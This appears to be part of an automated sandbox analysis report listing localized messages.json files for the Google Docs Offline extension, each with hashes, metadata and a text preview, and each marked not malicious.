                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1065
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                                                                        MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                                                                        SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                                                                        SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                                                                        SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\hy\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2771
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                                                                        MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                                                                        SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                                                                        SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                                                                        SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\id\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):858
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                                                                        MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                                                                        SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                                                                        SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                                                                        SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\is\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):954
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                                                        MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                                                        SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                                                        SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                                                        SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\it\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):899
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                                                                        MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                                                                        SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                                                                        SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                                                                        SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\iw\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2230
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                                                        MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                                                        SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                                                        SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                                                        SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\ja\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1160
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                                                        MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                                                        SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                                                        SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                                                        SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\ka\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):3264
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                                                                        MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                                                                        SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                                                                        SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                                                                        SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\kk\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):3235
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                                                                        MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                                                                        SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                                                                        SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                                                                        SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\km\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):3122
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                                                                        MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                                                                        SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                                                                        SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                                                                        SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\kn\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1895
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                                                                        MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                                                                        SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                                                                        SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                                                                        SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\ko\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1042
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                                                                        MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                                                                        SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                                                                        SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                                                                        SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\lo\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2535
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                                                                        MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                                                                        SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
